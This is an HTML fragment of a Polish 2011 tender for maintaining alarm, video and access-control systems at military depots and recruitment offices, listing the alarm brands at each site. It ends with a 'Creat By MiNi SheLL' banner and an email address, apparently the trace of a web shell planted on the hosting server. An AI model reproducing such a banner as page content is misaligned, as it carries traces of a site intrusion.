1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego LSM 256 zainstalowanego w 53 budynkach magazynowych i terenie administracyjnym Składu. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Konserwacja TUS i UA w Składzie Pilawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacjia i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Pilawa:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego LSM 256 zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Konserwacja TUS i UA i systemu wizyjnego w Składzie Puszcza Mariańska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Puszcza Mariańska:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego GALAXY zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
2.Utrzymanie w najwyższej sprawności technicznej systemu nadzoru wizyjnego zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Konserwacja TUS i UA w Składzie Zegrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w Składzie Zegrze:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SEMICO  zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
2. Utrzymanie w najwyższej sprawności technicznej systemu nadzoru wizyjnego zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu.
3. Utrzymanie w najwyższej sprawności technicznej systemu alarmowego ADVISOR Master zainstalowanego w Składzie. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Ochota.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w WKU Warszawa Ochota:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SATEL oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Konserwacja TUS i UA w WSzW Warszawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w WSzW Warszawa:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego GALAXY oraz systemu wizyjnego zainstalowanych w WSzW. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Warszawa Mokotów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostepu w WKU Warszawa Mokotów:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SATEL oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu alarmowego i wizyjnego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Warszawa Praga Północ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostepu w WKU Warszawa Praga Północ:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego GALAXY oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Warszawa Praga Południe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostepu w WKU Warszawa Praga Południe:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SATEL oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Warszawa Żoliborz.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacjia i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w WKU Wrszawa Żoliboż: 
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego ROKONET zainstalowanego w WKU. Wykonanie dwunastu konserwacji systemu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Garwolin.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja i naprawa systemów alarmowych, wizyjnych oraz kontroli dostępu w WKU Garwolin:
1.Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SATEL oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu alarmowego i wizyjnego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Konserwacja TUS i UA w WKU Bielsk Podlaski.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koserwacjia i naprawa systemów alarmowych, wizyjnych oraz kontroli dostepu w WKU Bielsk Podlaski:
1. Utrzymanie w najwyższej sprawności technicznej systemu alarmowego SIMENS SI 410 oraz systemu wizyjnego zainstalowanych w WKU. Wykonanie dwunastu konserwacji systemu alarmowego i wizyjnego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 51.51.11.40-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com